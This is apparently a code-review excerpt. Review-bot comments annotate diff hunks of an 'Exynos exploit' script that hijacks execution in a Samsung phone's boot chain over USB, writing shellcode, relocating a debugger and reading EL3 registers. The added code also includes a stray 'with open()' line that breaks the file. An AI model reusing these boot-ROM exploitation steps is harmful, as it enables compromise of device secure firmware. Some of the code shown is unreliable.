+ print(f'Jumped to {hex(address)} and back')
 def debugger_boot(self):
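Review bot: The clean-up at the end of `get_ttbr0_el3` now zeroes and re-reads `0x0206ed10`, which is where the shellcode was written, while the register value is stored by `ldr x2, =0x206fd10` and read back from `0x0206fd10`; before this change both paths used `0x020c1000`. As written the assertion `"TTBR0_EL3 not overwritten"` only proves the code buffer was zeroed and leaves the saved register value in memory. Hoist the two addresses into named locals at the top of the method, e.g. `code_addr = 0x0206ed10` and `value_addr = 0x0206fd10`, and use `value_addr` in the three clean-up lines (this also removes the mixed `0x206ed10`/`0x0206ed10` spellings). In `test_write_execute`, `mov x1, lr` is dead (nothing reads or restores `x1`) and the method never checks the write itself, so a read-back `assert self.cd.memdump_region(address, len(shellcode)) == shellcode, "write readback mismatch"` before `jump_to` would tell a failed write apart from a failed execute; both `f"""` literals here contain no placeholders and can be plain strings.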
@@ -611,13 +635,10 @@ class ExynosDevice():
 logger.debug('State after setting up initial debugger')
 self.cd.arch_dbg.state.print_ctx()
- # dumped = self.dump_memory(0x20000, 0x2070000)
- DEBUGGER_ADDR = 0x2069000 # 0x2069000
- self.get_ttbr0_el3()
 # Relocate to other debugger
- debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read()
+ debugger = open("../../dump/reloc_debugger_0x2048000.bin", "rb").read()
 self.relocate_debugger(debugger=debugger, entry=0x02048000, storage=0x02051000, g_data_received=0x02052000)
 DEBUGGER_ADDR = 0x02048000
@@ -707,6 +728,8 @@ class ExynosDevice():
 self.cd.memwrite_region(0x20219b8, p32(DEBUGGER_ADDR))
 # self.cd.restore_stack_and_jump(hijacked_fun)
+ # Write 'a1 00 00 00' to 0x0202a330
+ self.cd.restore_stack_and_jump(0x02024010)
 time.sleep(2)
@@ -715,6 +738,18 @@ class ExynosDevice():
 self.usb_read(0x200) # GiAs
 self.cd.arch_dbg.fetch_special_regs()
+ BL31_ra = self.cd.arch_dbg.state.LR
+
+ # Relocate debugger back to the start of the stack
+ # debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read()
+ # self.relocate_debugger(debugger=debugger, entry=0x14ac3000, storage=0x14ac4200, g_data_received=0x14ac4400)
+ # DEBUGGER_ADDR = 0x14ac3000
+
+ # Again restore bootflow
+ self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
+ self.cd.restore_stack_and_jump(hijacked_fun)
+ time.sleep(2)
+
 # ==== Stage 3 BL2 ====
 self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
@@ -738,6 +773,7 @@ class ExynosDevice():
 pass
+
 if __name__ == "__main__":
 arg = argparse.ArgumentParser("Exynos exploit")
 arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
@@ -769,3 +805,6 @@ if __name__ == "__main__":
 exynos.dumb_interact()
 sys.exit(0)
+
+
+with open()
\ No newline at end of file
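Review bot: `open("../../dump/reloc_debugger_0x2048000.bin", "rb").read()` names a file this commit does not add — the diffstat only touches `dump/reloc_debugger.bin` — so unless `reloc_debugger_0x2048000.bin` already exists in the repository this line raises `FileNotFoundError` before relocation starts. The path is also resolved against the working directory rather than the script, and the handle is never closed; `with open("../../dump/reloc_debugger_0x2048000.bin", "rb") as f: debugger = f.read()` at least fixes the latter. The removed `self.get_ttbr0_el3()` is the only call of that method visible in the diff, so if it has no other caller the method rewritten in the previous hunk is now unreferenced and deserves a comment at its definition saying when it is meant to be run. debugger_boot starts and ends outside the hunk.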
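Review bot: The new comment `# Write 'a1 00 00 00' to 0x0202a330` does not describe the line under it, `self.cd.restore_stack_and_jump(0x02024010)`, which jumps and writes nothing; either the write is missing or the comment is a leftover note. If it is a reminder, mark it as one and name the target in the same breath, e.g. `# TODO: write 'a1 00 00 00' to 0x0202a330 before jumping; 0x02024010 is <what lives there>`, since `0x02024010` appears nowhere else in the diff. The enclosing method starts and ends outside the hunk.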
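Review bot: `BL31_ra = self.cd.arch_dbg.state.LR` is assigned and never read within the hunk; if it is kept for a later stage, say so in a comment such as `# LR as left by BL31; consumed by <stage>`, otherwise drop it, and the same goes for the four commented-out relocation lines below it. The "Again restore bootflow" comment suggests the `memwrite_region(0x020200dc, p32(hijacked_fun))` / `restore_stack_and_jump(hijacked_fun)` / `time.sleep(2)` sequence already occurs earlier in debugger_boot; if so, a small helper like `_resume_bootflow(self, hijacked_fun)` would keep the two call sites identical, and the fixed two-second sleep could be replaced by waiting for the debugger's reply the way the `GiAs` read just above does. `hijacked_fun` is defined outside the hunk.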
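Review bot: `with open()` at the end of the file is not valid Python — no context target, no colon, no body — so after this commit `exploit.py` fails to compile and nothing in it can run, including the `__main__` block above. Even as a complete statement it would sit at module level after `sys.exit(0)` and never execute. Remove the three added lines, or finish the statement inside the `__main__` block if a file write was intended.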